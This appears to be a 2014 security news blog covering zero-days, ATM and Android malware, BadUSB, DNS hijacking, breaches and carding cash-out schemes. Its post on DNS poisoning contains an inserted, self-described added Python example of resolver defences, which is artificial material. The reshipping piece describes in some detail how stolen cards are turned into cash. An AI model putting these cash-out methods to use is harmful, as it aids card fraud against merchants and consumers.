Sunday, October 26, 2014

Microsoft warns of security flaw in PowerPoint slides

Microsoft has warned Windows users about a zero-day security issue with malicious PowerPoint documents being emailed to recipients. The software giant is working on a patch for the problem.

Another Microsoft OLE security issue revealed...
The bad news is that the vulnerability affects all versions of Windows from Server 2003 to Windows 8.1. Perhaps worse, the flaw is buried in the code that handles OLE (object linking and embedding) calls, allowing one Microsoft application to directly call another.

Some researchers have pointed out that this zero-day is similar to one patched last week, when Microsoft issued no fewer than eight updates, including one for the Sandworm flaw, which was known to have been exploited in the wild while an update was still pending.

While it works on a patch, Microsoft has released an interim Fix it tool that, when applied, blocks the attacks seen so far. The tool can be downloaded from Microsoft's support pages.

Microsoft has also asked Windows users to pay attention to the User Account Control (UAC) pop-ups, the small alerts that require authorisation before the OS is allowed to perform certain tasks, such as downloading files or running software.

According to Steve Armstrong, technical security director with pen testing specialist Logically Secure, whilst the impact of a Microsoft zero-day is bad, looking at the published workarounds suggests that users who enable UAC by default, and who do not have users with highly privileged accounts, can minimise the risks involved.


Open-Source Bugs Affect Web Applications

An average of eight severe security flaws from open-source and third-party code can be found in each web application, according to new findings from Veracode.

If the Heartbleed and Shellshock vulnerability scares didn't drive home the increasing risk that open-source software poses to today's applications, consider this: Open-source and third-party code brings an average of 24 known security bugs to every web application, according to new data.

Open-source and third-party software components also introduced an average of eight "very high severity" or "high severity" security flaws to applications, according to Veracode, which today released findings from an analysis it conducted of more than 5,300 enterprise web applications uploaded to its code-scanning service over the past two months.

"The use of open source has increased heavily over time. Enterprises have become more comfortable using it," says Chris Wysopal, CTO at Veracode. "At the same time, the researcher community and attacker communities have woken up to this, too… That's why you're seeing Heartbleed and Shellshock, because people are looking at it and scrutinizing it. In the last year or two, all that code has been reviewed and made better. But it's probably only going to get worse" as researchers find more bugs and attackers start using them.

Dennis Chu, senior product manager at Coverity, which discovered 688 OWASP Top 10 security issues in 37 open-source projects it recently studied, says open-source bugs are often the cause of stealthy attacks. "A lot of times open-source bugs manifest themselves in very invisible security breaches."

It's not that open-source and third-party code is necessarily inherently more or less secure than commercial software, security experts say. Some open-source projects have been strapped for resources to keep the code clean -- leading to problems like Heartbleed, for instance -- but the real issue now is that more enterprises use open-source code, and researchers, as well as attackers, are taking notice.


Read More: http://www.darkreading.com/application-security/open-source-software-brings-bugs-to-web-applications/d/d-id/1316878?_mc=NL_DR_EDT_DR_weekly_20141023&cid=NL_DR_EDT_DR_weekly_20141023&elq=39da7f9fc52a4cd6ada82d9d5e34a2e9&elqCampaignId=9872 

Monday, October 20, 2014

Malvertising campaigns hit US military industry to steal secrets and intellectual property

A new wave of malvertising attacks aimed at cyber espionage is targeting military contractors to steal military secrets and intellectual property.

Security experts at security company Invincea have uncovered a new malvertising campaign used as an attack vector for highly targeted cyber espionage operations against at least three firms in the US military industry.

Malvertising is becoming ever more popular in the criminal underground; many cases spotted recently exploited the ad networks of IT giants such as Google and Yahoo.

According to the experts at Invincea, the malvertising campaign allowed threat actors to steal military secrets or intellectual property, rather than serving click fraud or financial fraud (e.g. phishing). The circumstance is alarming because many of the targeted companies provide technology for use in combat zones.

“In the past, we have seen organized cyber crime learn attack techniques from advanced nation state actors,” Invincea Chief Executive Anup Ghosh said, using industry parlance for cyber spies. “This is a case where advanced state actors would be learning from cyber crime in terms of methods and tactics.”

The researchers discovered that, using highly targeted online advertising, threat actors hit major U.S. military contractors in the past few weeks; Invincea declined to name the victims of the malvertising campaigns.

“Data security breaches now regularly hit high-profile businesses such as banks and retailers, leaving millions of consumers vulnerable to identity theft and financial fraud. But research into malvertising has revealed how cyber-criminals and spies can use the marketing industry’s latest tools to pinpoint high-value targets,” reports the Reuters agency.

The experts at Invincea spotted up to six malvertising attacks that targeted one aerospace contractor and other military contractors in the last weeks of September.

The experts haven’t provided any information on the alleged source of the malvertising attacks; instead they confirmed that the attackers used demographic targeting tools available to any online marketer to exploit advertising bidding networks.


“Perpetrators can set up a corporate front to deliver normal ads, then swap landing pages from time to time for malicious code. They place these ads on advertising exchanges and bid up prices for placement on sites that its targets are known to visit, based on what they glean from these intended victims’ advertising profiles,” states Reuters.

Malvertising websites are difficult to pin down: the majority of them belong to the category of One Day Wonders, so they stay online just for the duration of the attack, typically less than four hours. A study conducted by Blue Coat on 660 million unique hostnames reports that 470 million websites are One Day Wonders and 22 percent are malicious.

The analysis conducted by experts at Invincea confirms the presence of serious flaws in most online advertising networks that could easily be exploited by threat actors.

“Any real-time ad bidding service that allows for automatic redirection is inherently insecure,” said Pat Belcher, who heads Invincea’s security analytics team, which conducted the forensic research. “It is across the board.”

Unfortunately, cyber criminals are winning the fight against the online advertising industry; recent cases demonstrate that the web ad industry is still vulnerable to malvertising campaigns.

Ad networks are too easy to compromise, and unaware users lack the skills and tools needed to protect their machines.

The major advertising organizations in the US will collaborate to monitor and prevent illegal activities.

“Criminal activity threatens to erode trust in the digital ecosystem,” Randall Rothenberg, chief executive of the Interactive Advertising Bureau said. “It is time that publishers, marketers and agencies stand together to combat these dangerous forces as a unified entity.”

Unfortunately, as Invincea explains, malvertising is a common practice that is not properly addressed by the advertising industry; it is time to consider security an indispensable investment and not a cost to be reduced.


Wednesday, October 8, 2014

Hackers Steal Millions In Cash From ATMs, Using Tyupkin Malware

Attackers add fail-safes to prevent innocents from triggering the attack and money mules from going rogue.

Attackers are infecting ATMs in Asia, Europe, and Latin America with malware, and walking off with stacks of cash, Kaspersky has found. Using the malware, called Tyupkin, and a team of money mules, the attackers have stolen what amounts to millions of dollars in cash.

“Over the last few years, we have observed a major upswing in ATM attacks using skimming devices and malicious software," said Vicente Diaz, principal security researcher at Kaspersky Lab, in a statement. "Now we are seeing the natural evolution of this threat with cyber-criminals moving up the chain and targeting financial institutions directly. This is done by infecting ATMs themselves or launching direct APT-style attacks against banks. The Tyupkin malware is an example of the attackers taking advantage of weaknesses in the ATM infrastructure.”

The good news is that the infection and theft require physical access to the ATM. The bad news is that it's easy to come by, since ATMs are intended to be physically accessible by the general public 24/7. That said, the attackers only went after machines that did not have security alarms installed.

Once access is gained, the attackers reboot the machine using a bootable CD that installs Tyupkin. The malware then runs in a loop, waiting for a command. It only accepts commands on Sunday and Monday nights, when the mules' suspicious withdrawals are less likely to be noticed.

During those hours, a unique key, based on a random set of numbers displayed by the ATM, is generated for each session. Video evidence shows that the mule collecting the cash calls another gang member on the phone and gives them that random combination. The person on the other end of the call then runs those digits through an algorithm to generate the session key, and gives the key to the mule. Once the key is entered, the machine displays the amount of cash located in each cassette, and dispenses 40 banknotes from whichever cassette the attacker chooses.

The process prevents both regular customers from accidentally triggering the attack and money mules from trying to steal the money themselves without the rest of the gang knowing about it.




Monday, October 6, 2014

Google Indonesia was Hacked

As reported a few hours ago, Google Indonesia was hacked and its page left defaced for hours. The technology giant's Indonesian domain, www.google.co.id, was hacked and left defaced for several hours in the morning; the well-known Pakistani hacker group “Team Madleets” claimed responsibility for the hack.

Google Indonesia was hijacked using a hacking method known as DNS spoofing (DNS cache poisoning). The Pakistani hacker group “Team Madleets” is known for such attacks targeting big websites like Google; last year the same method was used to hijack the Google Malaysia domain.

What is DNS Poisoning?
In short, DNS spoofing or DNS cache poisoning is a hacking attack, whereby data is introduced into a Domain Name System (DNS) name server’s cache database, causing the name server to return an incorrect IP address, diverting traffic to another website.

Normally, a networked computer uses a DNS server provided by an Internet service provider (ISP). Such servers are deployed to improve resolution response time by caching previously obtained query results.

The attacker spoofs the DNS entries for a target website on a given DNS server, replacing the legitimate IP address with the IP address of a server he controls, thus redirecting all traffic to his deface page. It is believed that DNS spoofing led Google Indonesia's users to another IP address that served the Madleets deface page.
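To make the defensive side of the cache poisoning described above concrete, the following added example (not code from the original post, and not any real resolver's implementation) models the acceptance checks a caching resolver applies before trusting a reply: the transaction ID and destination port must match an outstanding query, the question section must match, and only records inside the queried zone (the bailiwick) are cached. The resolver class, record types and sample replies are all constructed for this illustration.

```python
"""Toy model of the checks a caching DNS resolver uses to resist cache poisoning.

Constructed example; it does no network I/O and simplifies real resolver logic
(no DNSSEC validation, no TTL expiry, no CNAME chasing).
"""
from dataclasses import dataclass, field
import secrets


@dataclass
class Query:
    txid: int       # 16-bit transaction ID, randomised per query
    qname: str
    qtype: str
    src_port: int   # randomised source port, the second value a forger must guess


@dataclass
class Record:
    name: str
    rtype: str
    value: str
    ttl: int


@dataclass
class Reply:
    txid: int
    qname: str
    qtype: str
    dst_port: int
    answers: list
    additional: list = field(default_factory=list)


def in_bailiwick(name: str, zone: str) -> bool:
    """True if name is the zone apex itself or a subdomain of the zone."""
    name = name.lower().rstrip(".")
    zone = zone.lower().rstrip(".")
    return name == zone or name.endswith("." + zone)


class CachingResolver:
    def __init__(self):
        self.cache = {}     # (name, rtype) -> Record
        self.pending = {}   # (txid, src_port) -> (Query, zone being asked)

    def send_query(self, qname: str, qtype: str, zone: str) -> Query:
        """Record an outstanding query with a random TXID and source port."""
        q = Query(secrets.randbelow(1 << 16), qname, qtype,
                  1024 + secrets.randbelow(65536 - 1024))
        self.pending[(q.txid, q.src_port)] = (q, zone)
        return q

    def accept(self, reply: Reply) -> list:
        """Apply the anti-poisoning checks; return the records actually cached."""
        key = (reply.txid, reply.dst_port)
        if key not in self.pending:
            return []                      # no matching query: forged or stale reply
        q, zone = self.pending[key]
        if (reply.qname.lower(), reply.qtype) != (q.qname.lower(), q.qtype):
            return []                      # question section does not match
        del self.pending[key]              # one reply per query
        stored = []
        for rec in reply.answers + reply.additional:
            if not in_bailiwick(rec.name, zone):
                continue                   # out-of-bailiwick data is never cached
            self.cache[(rec.name.lower(), rec.rtype)] = rec
            stored.append(rec)
        return stored

    def lookup(self, name: str, rtype: str):
        rec = self.cache.get((name.lower(), rtype))
        return rec.value if rec else None


def demo():
    """Constructed scenario: one forged reply, then one legitimate reply with bad glue."""
    r = CachingResolver()
    q = r.send_query("www.example.com.", "A", zone="example.com.")
    # Forged reply that guessed the wrong transaction ID: must be dropped.
    forged = Reply((q.txid + 1) % 65536, q.qname, "A", q.src_port,
                   answers=[Record("www.example.com.", "A", "203.0.113.66", 86400)])
    # Legitimate reply whose additional section tries to plant a record for
    # another domain; the answer is cached, the out-of-bailiwick record is not.
    legit = Reply(q.txid, q.qname, "A", q.src_port,
                  answers=[Record("www.example.com.", "A", "192.0.2.10", 300)],
                  additional=[Record("www.example.org.", "A", "203.0.113.66", 86400)])
    forged_stored = r.accept(forged)
    legit_stored = r.accept(legit)
    return r, forged_stored, legit_stored


if __name__ == "__main__":
    resolver, forged_stored, legit_stored = demo()
    print("forged reply cached:", forged_stored)
    print("legitimate reply cached:", [rec.name for rec in legit_stored])
    print("www.example.com. ->", resolver.lookup("www.example.com.", "A"))
    print("www.example.org. ->", resolver.lookup("www.example.org.", "A"))
```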

Google Indonesia website was left defaced for several hours
While it is not clear for how long the Google Indonesia website was left defaced, reports suggest that the attack continued for hours; Team MaDLeeTs also replaced the initial deface page with a new one after two hours.


BadUSB Malware Returns

Back in July, a massive security hole called “BadUSB” was discovered that gave hackers the ability to hijack billions of USB devices, from keyboards and printers to USB drives. Because of the severity of the issue, the researchers who discovered the security flaw did not publish their BadUSB exploit code.

However, two other hackers have since worked out how to exploit BadUSB and released a set of hacking tools that can be used to convert a USB drive into a silent malware installer. They have also published their BadUSB malware source code on the open-source code hosting site GitHub. Device makers are now under pressure to actually fix the security flaw before millions of users have their USB devices exploited, which is a big problem as there is no easy security fix for BadUSB.

What is BadUSB ?
In short, every USB drive has a microcontroller in it, a small chip that acts as an interface between the device (keyboard or flash drive) and the host (PC). This small chip often has firmware that can be reprogrammed to do notorious things, such as logging your keystrokes and infecting your personal computer with malware, or something much worse. BadUSB is so dangerous because of one factor: it is undetectable, even when the device is scanned by an antivirus program.

The security researchers who originally discovered BadUSB, Karsten Nohl and his colleagues at SR Labs, announced the bug's existence in July and shared more details with device makers. The German security researchers did not publish their source code because they thought it would be dangerous and too hard to patch.

“We really hope that releasing this will push device manufacturers to insist on signed firmware updates, and that USB manufacturer Phison will add extra support for signed updates to all of the controllers it sells,” Caudill said in his blog. “Phison Electronics isn’t the only player, though they are the most common. I’d love to see them take the lead in improving security for these devices.”

Now, however, two security researchers, Adam Caudill and Brandon Wilson, have rediscovered the same BadUSB bug and, more importantly, published their proof-of-concept at Derbycon in Kentucky. It has the capability to spread itself by hiding in the firmware that controls the way USB drives connect to computers.

If you know what you’re doing, you can grab the source code and start exploiting USB devices straight away. The hack uses the security flaw in USB to write a self-replicating worm that logs passwords and other sensitive data, and an attacker who does so stands to make millions of dollars.

Source Code is Available On Internet for Free
The two security researchers justified their release at the Derbycon hacker conference in Louisville last week. Both were able to reverse engineer the USB firmware, infect it with their own malicious code and hijack the associated device. They also underlined the danger of the BadUSB hack by going in depth into the source code.

The two security researchers replicated the emulated keyboard attack, and also showed how to create a hidden partition on thumb drives to defeat forensic tools and how to bypass the password for protected partitions on some USB drives that provide such a feature.

The BadUSB vulnerability is present in the controllers of only one Taiwanese electronics company, Phison Electronics, but a Phison-based USB device can infect any device it is plugged into. The Taiwanese USB manufacturer has not yet revealed for whom it manufactures USB drives.

BadUSB Vulnerability is Undetectable & Unpatchable
The vulnerability in Phison USB controllers basically allows the firmware of USB devices to be modified, which can be done easily from inside the operating system, and hides the malware in the USB device in a way that makes it almost impossible to detect, even by antivirus software. The security flaw gets even worse because completely formatting or deleting the contents of a USB device will not remove the malicious code, since it is embedded in the firmware.

According to Wired, this BadUSB vulnerability is practically unpatchable because it exploits the very way USB devices are designed. Once infected, each USB drive will infect anything it is connected to.

Impact of BadUSB Vulnerability
Once the device is compromised, the USB devices can reportedly:

1) log keystrokes
2) alter folders and files
3) infect other devices and systems
4) spoof a network card to change the computer’s DNS settings
5) install malware and control the keyboard

Protection Against the BadUSB Attack
For the time being, the best mitigation against the BadUSB vulnerability and similar exploits is good security practice: always keep your software updated, never open files you don’t recognise, and don’t plug any device into your computer unless you know where it has been.


Wednesday, October 1, 2014

List of Cyber Attacks and Data Breaches in September

Although this month’s list may not be as long as August’s, it’s by far the most shocking of the year so far. The number of payment card breaches in the US appears to be going up and up and an end isn’t in sight. This list will continue to be updated until the very end of September, and as there’s a high chance of more breaches due to the revelation of Shellshock, I suggest you come back for updates.

Payment card breaches

880,000 Affected by Viator Payment Card Breach

Hundreds of US Stores Affected as POS Provider is Hacked

Biggest ever data breach? Home Depot hack attack could involve 60 million payment cards

800k Payment Cards Compromised in Goodwill Industries Breach

Payment card data stolen in Jimmy John’s data breach

Hotel Chain Suffers Payment Card Breach

Personal data breaches

Florida medical center hit with breach for third time in two years

Data breach at Tampa General Hospital

Central Utah Clinic notifies over 30K patients of potential HIPAA breach

Computer hardware containing patient data stolen from Ohio plastic surgery office

5 Million Leaked Gmail Passwords Sounds Pretty Scary, But Was It?

Other attacks and breaches
Ello? ello? ello?: Facebook challenger in DDoS KNOCKOUT

Biggest attack on RT.com: Website hit by 10 Gbps DDoS

Operation Harkonnen: European Cyber Espionage Went Undetected for 13 Years

Naked pictures of Jennifer Lawrence and other celebrity starlets leak online

eBay XSS vulnerability used iPhones as bait, redirected users to phishing page

Hackers attack Namecheap accounts

Healthcare information compromised at Temple University, Philadelphia

ObamaCare Website Hacked

New ‘Shellshock’ bash bug affects 500 million computers, servers and devices.




Monday, August 11, 2014

Keyless Smart Cars are now target for hackers

Now it is the turn of smart keyless cars to become a target for hackers: that high-tech keyless car security system is pretty sweet for them too. According to a new report in Wired, thieves can use off-the-shelf hardware and software to impersonate a vehicle's security fob and break into a car in no more than a few minutes.

This vulnerability in keyless vehicles illustrates what is practically an axiom in technology: Convenience often reduces security. And in a corollary truth, hackers are usually at least one step ahead of the technologies intended to thwart them.

Australian security researcher Silvio Cesare plans to review his findings about this new approach to keyless break-ins at this week's Black Hat Internet security conference in Las Vegas. The annual event is a place where people from law enforcement, security experts, military intelligence and even the shady side of the street come together.

People have previously found weaknesses in keyless entries. In 2012, for instance, a rash of Chicago car break-ins were linked to someone using some kind of electronic tool.

Meanwhile, Swiss researchers have found a way to get someone's key fob to broadcast an open command so it can be duplicated, potentially allowing thieves to break into and operate a car.

However, Cesare thinks he may be the first to actually crack the encryption intended to guard the keyless systems. He built a device that kept pressing the buttons on his own fob. After collecting thousands of samples of the codes intended to be picked up by the car, he found patterns that reduced the number of possible codes to unlock a vehicle from 43 million to fewer than 13,000.

That's still a big number for humans, but computers can try that many sequences without getting bored, wasting time or needing a bathroom break.

Other auto threats are also a topic of discussion at the Black Hat conference. According to InformationWeek, as cars increasingly feature on-vehicle wireless networks that connect with satellite services and smartphones, they become more vulnerable to remote attacks. By breaking into a car's Bluetooth network or a phone app, for instance, someone could in theory control a car's steering, braking or automated parking.

Last year, researchers showed how they could take control of many basic functions in a 2010 Toyota Prius and 2010 Ford Escape. Among new vehicles, the 2014 Jeep Cherokee, 2014 Infiniti Q50 and 2015 Escalade are the most vulnerable to attack, according to security researchers. A 2014 Audi A8 was deemed the least vulnerable model to electronic attack because the car's networked systems are separate from its physical operational systems.

The automobile industry has begun to take such threats more seriously. Last month it announced a mechanism to share security vulnerabilities.



One million Android devices infected in China

One million Android devices in China were infected with the Xshqi SMS worm on August 2, the day the country celebrated its Valentine’s Day.

Experts at Kaspersky Lab revealed that a malware, dubbed Trojan.AndroidOS.Xshqi.a, infected nearly 500,000 Android devices in just six hours last week in China, but Chinese media gave a more pessimistic estimate, declaring that the number of infected mobiles is over 1 million smartphones.

The attackers timed their operation to coincide with the day the country celebrated Valentine’s Day, as explained by the Kaspersky team.

“The fact that this Trojan combination appeared on the Chinese Valentine’s Day is premeditated, taking advantage of user credulity on this special day. And it uses social engineering techniques to spread as much as possible and infect more devices. This Trojan is a good example of why it’s always worth thinking twice about trusting a link received on your mobile phone. No matter who sends it, it could still be a malicious program,” reported researcher Vigi Zhang in a blog post.

The malware has been classified as a mobile SMS worm, but it also includes two malicious modules, XXshenqi.apk and its asset Trogoogle.apk: the first is used to spread the malicious code, while the other component is a backdoor.

Once a mobile device is infected by Trojan.AndroidOS.Xshqi.a, the malware sends malicious SMS messages to all the contacts in the victim’s address book. The link in the message is used by the malware authors to get the recipients to install the Trojan as well. Trojan.AndroidOS.Xshqi.a then checks for the presence of Trogoogle.apk; if it is not installed, it displays a dialog window prompting the user to install Trogoogle.apk, detected by Kaspersky as Backdoor.AndroidOS.Trogle.a.

The backdoor is used by cybercriminals to perform numerous operations; for example, in order to steal the victim’s personal information it asks the user to register the app. The backdoor also enables the attackers to control the victim’s device and send it various commands, for example to create and send text messages.

Chinese law enforcement has already identified the author of the malicious campaign, he is a 19-year-old college student that admitted creating the malicious code, but he claimed that he only did it for fun. The young man was detained in the city of Shenzhen while visiting his parents.


Wednesday, August 6, 2014

Russian cyber criminals hacked 1.2 billion usernames and passwords

A Russian group has hacked 1.2 billion usernames and passwords belonging to more than 500 million email addresses, according to Hold Security - a US firm specialising in discovering breaches.

Hold Security described the hack as the "largest data breach known to date".

It claimed the stolen information came from more than 420,000 websites, including "many leaders in virtually all industries across the world".

Hold Security did not give details of the companies affected by the hack.

"They didn't just target large companies; instead, they targeted every site that their victims visited," Hold Security said in its report.

"With hundreds of thousands of sites affected, the list includes many leaders in virtually all industries across the world, as well as a multitude of small or even personal websites."


The New York Times, which first reported the findings, said that on its request "a security expert not affiliated with Hold Security analysed the database of stolen credentials and confirmed it was authentic".

"Another computer crime expert who had reviewed the data, but was not allowed to discuss it publicly, said some big companies were aware that their records were among the stolen information," the paper said.

The paper added: "Hold Security would not name the victims, citing nondisclosure agreements and a reluctance to name companies whose sites remained vulnerable."

The Wall Street Journal later revealed that Hold intended to offer website owners the ability to check whether they had been affected, but only if they paid a fee.

The firm initially posted a message on its site saying it would charge $120 (£71) a month for the "breach notification service", however the details have since been replaced with a message saying "coming soon!".

Multi-pronged attack?

Hold Security, which has previously reported about hacks on Adobe and Target, said it took more than seven months of research to discover the extent of the latest hack.

The firm claimed the gang initially acquired databases of stolen credentials from fellow hackers on the black market.

"These databases were used to attack e-mail providers, social media, and other websites to distribute spam to victims and install malicious redirections on legitimate systems," Hold Security said.

The hackers also got access to data from botnets - a network of computers infected with malware to trigger online fraud.

Hold Security said the botnets helped the hacking group - which it dubbed CyberVor - identify more than 400,000 websites that were vulnerable to cyber attacks.

"The CyberVors used these vulnerabilities to steal data from these sites' databases," the firm said.

"To the best of our knowledge, they mostly focused on stealing credentials, eventually ending up with the largest cache of stolen personal information, totalling over 1.2 billion unique sets of e-mails and passwords."


Wall Street Journal’s Facebook Page Hacked

On July 21, the Journal confirmed that its Facebook account was hacked and false comments posted. "We are aware that our Facebook page was compromised," the newspaper said. "We have deleted the posts and are looking into it."

News site Mashable took screen-grabs of the fake comments. One of the comments read, "#BREAKING: US Air Force One crash feared as air traffic controller loses contact with pilot over Russian air space."

The Journal confirmed to Information Security Media Group that the unauthorized postings to its Facebook page were due to a compromise of a third-party account. "We acted quickly to remove the erroneous material and have reset affected accounts," according to a statement from the newspaper.

What's At Stake?

The incident highlights the many risks of a corporate social media account takeover, says Nikki Junker, communications and media manager at the Identity Theft Resource Center. "These risks range from damage to a brand's reputation to global financial impact, as was seen in the hacking of an Associated Press Twitter account last year," which caused the Dow Jones Industrial Average to drop 143 points, she says (see: Social Media Needs 2-Factor Authentication).

Shirley Inscoe, a security analyst at consultancy Aite Group, says the attack could have been a test to see if the hackers could post the false items successfully and how long it would take to be removed. "Media and social websites need to be much more security conscious than they have proven to be to date," she says.

It's important to take advantage of two-factor authentication offered by many social networks, Junker says. "You can set both your Twitter and Facebook accounts to send you a text message with a verification code which must be entered in order to log-in to an account," she says. "While it may take a bit of extra time, it can help prevent serious problems for your organization."

Hacker's White Label Money Laundering Services

Laundering the spoils from cybercrime can be a dicey affair, fraught with unreliable middlemen and dodgy, high-priced services that take a huge cut of the action. But large-scale cybercrime operations can avoid these snares and become much more profitable when they’re able to disguise their operations as legitimate businesses operating in the United States, and increasingly they are doing just that.

The typical process of “cashing out” stolen credit card accounts
Today’s post looks at one such evolution in a type of service marketed to cybercrooks that has traditionally been perhaps the most common way that thieves overseas “cash out” cybercrimes committed against American and European businesses, banks and consumers: The reshipping of goods purchased through stolen credit cards.




Cybercrooks very often rely on international reshipping services to help move electronics and other goods that are bought with stolen credit cards, shipped abroad, and then sold for cash. Many fraudsters use stolen credit cards to pay for U.S. Postal Service and FedEx shipping labels (a.k.a. “black labels”), but major shipping providers appear to be getting better at blocking or intercepting packages sent with stolen credit cards (at least according to anecdotal evidence from the cybercrime forums).

As a result, crooks increasingly are turning to a more reliable freight: So-called “white label” shipping services that are paid for with cybercrime-funded bank accounts via phony but seemingly legitimate companies in the United States.

CASHING OUT
In the case of a breach at an online merchant that exposes the card number, expiration and card verification value (CVV), the compromised card numbers typically are used to purchase high-priced electronics at online stores that are known to be “cardable”, that is, stores that will ship to an address different from the billing address.

In the case of “card present” breaches (such as those that have hit Target, Neiman Marcus, P.F. Chang’s and others), where attackers use malicious software to compromise cash register transactions and gather data that can be used to fabricate new cards, fraudsters employ teams of “runners” who use the card data to create counterfeit cards and buy high-priced merchandise at big box retailers.

In either card-present or card-not-present fraud, one of the most lucrative ways for fraudsters outside of the United States to cash out stolen credit cards is to have carded goods shipped overseas, where electronics and other luxury items typically sell for a much higher price than in the United States.

The hardest step in this whole process is successfully getting the goods out of the United States, because a large percentage of retailers simply refuse to ship to areas like Russia and Ukraine due to high rates of fraud associated with those regions.

Traditionally, fraudsters get around this restriction by turning to reshipping services that rely on “mules,” people in the United States who get recruited to reship packages after responding to work-at-home job scams. These reshipping mules are sent multiple packages containing electronics that have been purchased with stolen credit and debit cards. They’re also sent prepaid and pre-addressed shipping labels, and the mules are responsible for making sure the goods are reshipped quickly and accurately.

Over the past year, however, more and more users of reshipping services advertised in the cybercrime underground have reported problems with a greater share of their packages being intercepted or canceled. Apparently, the shipping companies are getting better at detecting shipping labels that are paid for with stolen credit cards and hijacked accounts.

LABEL CITY
Enter LabelCity, a “white label” service that advertises “corporate rates” for shipping Priority Mail International through the U.S. Postal Service (USPS), rates that come in slightly below the rates that the USPS charges retail on its shipping calculator.

LabelCity’s “corporate” rates for its “white label” USPS International shipping service.

“Our service provides 100% guarantee on delivery of the goods. Return of funds to 30 days,” the proprietor of LabelCity promises in an online advertisement. “We started doing white labels (i.e., cash disbursed-for)! Our labels are made automatically through the admin panel, and automatic replenishment! Our corporate rates will surprise you, minus 15-20% of the price of USPS!”

Services like LabelCity explain why reshipping operations remain among the most popular methods of cashing out many different forms of cybercrime: Buying luxury goods that can be resold overseas at a significant markup amplifies the fraudster’s “profit.”

A slightly redacted ad for LabelCity’s services pimps black and white labels.

Take, for example, the scourge of IRS tax refund fraud, an increasing form of cybercrime that has been documented extensively on this blog. With refund fraud, the IRS is tricked into sending the fraudsters prepaid credit cards that can be used like cash. But rather than merely pulling the cash from those cards out of ATMs all around the world, it makes more sense for the crooks to take that cash and reinvest it into purchasing goods here in the United States that can often sell for twice the purchase price in countries like Russia and Ukraine.

LabelCity is a great reminder that cybercrime is seldom an isolated event or a single-victim crime: Much of it is connected in some way. In most cases, one fraud begets another, and thieves, particularly those perpetrating such crimes from across international borders, often string together multiple forms of fraud in a bid to extract maximum value from their activities.



Thursday, July 10, 2014

Can India defend Cyber Security threats?

India is becoming increasingly vulnerable to cyber attacks: according to Symantec’s 2013 Norton Report, attacks like ransomware and spear-phishing have cost Indian individuals and companies some $4 billion. A research report found an alarming 136 percent increase in cyber threats and attacks against Indian government organizations and a 126 percent spike in attacks targeting financial services organizations.

Last year brought a marked increase in the frequency of cyber attacks on Indian assets, with government and private infrastructure equally affected. A research report found an alarming 136 percent increase in cyber threats and attacks against Indian government organizations and a 126 percent spike in attacks targeting financial services organizations. According to Symantec’s 2013 Norton Report, by July 2013 sophisticated cyber assaults like ransomware and spear-phishing had cost Indian individuals and companies some $4 billion.

At a time of heightened online breaches (phishing, defaced websites, network break-ins, virus attacks), the Indian government published its first ever National Cyber Security Policy (NCSP) in early July 2013.

Cyber attacks:
1. Cyber attacks were reported on the Indian Navy’s Eastern Command systems in June 2012. The Eastern Naval Command oversees the maritime activities in the South China Sea, as well as the development of ballistic missile submarines.

2. On July 12, 2013, just days after the NCSP was released, several high-level officials of the GOI reported their emails had been hacked. A subsequent investigation put the total number of hacked accounts at roughly 12,000, including systems from the Ministry of External Affairs, Ministry of Home Affairs, Defence Research and Development Organisation (DRDO), and the Indo-Tibetan Border Police Force (ITBP). Even the main National Informatics Centre email server, which serves as the nexus for all government departments, was believed to have been affected.

Officers from the National Technical Research Organization (NTRO), India’s premier technical intelligence agency under the NSA, believed that the hacks were directed at networks hosting state secrets.

While any number of countries could be after secrets from the foreign and home ministries and DRDO, only one would be interested in ITBP: China, with which India has a long-running boundary dispute. This, along with the PLA’s recent involvement in cross-globe cyber espionage, should be ringing alarm bells in New Delhi. The U.S. recently indicted five People’s Liberation Army officers for hacking and economic espionage, in what is known as the Unit 61398 case. Although Beijing has repeatedly denied state involvement, a 2009 executive summary prepared for the American Congress by Northrop Grumman states that the malicious software being used was designed to steal data only a nation-state would want, primarily seeking defense-engineering specifications, military operational information, and U.S.-China policy documents.

There are few reports of Pakistan and India indulging in overtly threatening cyber warfare, although in recent times, hacker groups based out of Lahore and Karachi have managed to break into the websites of the Central Bureau of Investigation (CBI) and the Bharat Sanchar Nigam Limited (BSNL), mostly to deface the sites and leave hate mail. However, it is widely speculated that regional terrorist outfits, such as the Indian Mujahideen (IM), make heavy use of social media sites to not only communicate effectively, but also to conduct recruitment drives, all under the government’s nose. Any cyber policy instituted by the GOI will need to actively deal with these issues.


Norton Report 2013 on Cybercrime

Norton has released its 2013 cyber security report, which covers 24 countries:

Australia, Brazil, Canada, China, Colombia, Denmark, France, Germany, India, Italy, Japan, Mexico, Netherlands, New Zealand, Poland, Russia, Saudi Arabia, Singapore, South Africa, Sweden, Turkey, United Arab Emirates, United Kingdom, United States of America

Who is affected most by cybercrime?
Cybercrime victims are more likely to be male (64%, compared to 58% of females) and millennial (66%, compared to 54% of baby boomers).

And:
• Mobile device owners – 63%
• Social network users – 63%
• Public / unsecured Wi-Fi users – 68%
• Emerging markets – 68%
• Parents of children 8-17 – 65%

Highest number of cybercrime victims found in:
85% China
77% Russia
73% South Africa

Key themes
Tablet and smartphone consumers leave security behind: almost 1/2 don’t use basic precautions such as passwords, security software or backing up files for their mobile device, and more than one-third have experienced mobile cybercrime in the last year.

The global price tag of consumer cybercrime: US$113 billion annually; cost per cybercrime victim up 50 percent.
The scale of consumer cybercrime: 1 million+ victims daily, 12 victims per second.


Read the more detailed report at: http://www.yle.fi/tvuutiset/uutiset/upics/liitetiedostot/norton_raportti.pdf

Thursday, July 3, 2014

Google shutting down Orkut by September 30

Internet giant Google said it will shut down Orkut, which is popular in India and Brazil, on September 30, 2014. Orkut did not attract enough users to compete with other social networking sites.

Ten years ago, Orkut was Google’s first foray into social networking. Built as a “20 percent” project, Orkut communities started conversations, and forged connections, that had never existed before. Orkut helped shape life online before people really knew what “social networking” was.

However, according to its website about 50.6 per cent of its users were from Brazil. Another 20.44 per cent came from India, while the US and Pakistan accounted for 17.78 per cent and 0.86 per cent, respectively.

"Over the past decade, YouTube, Blogger and Google+ have taken off, with communities springing up in every corner of the world. Because the growth of these communities has outpaced Orkut's growth, we've decided to bid Orkut farewell," Google said in a post on the Orkut blog.

Orkut was launched in 2004, the same year when Facebook was founded. Facebook is now the world's largest social network with 1.28 billion users.

Orkut was the result of a "20 per cent project" in which Google workers got to spend a fifth of their time on ideas not necessarily related to their job responsibilities.

Google launched its Google+ social network in 2011 and has been slowly weaving it into other services. While Google+ was positioned to compete with Facebook in the beginning, over the last few years, it has established Google+ as a unified "user identity" system.

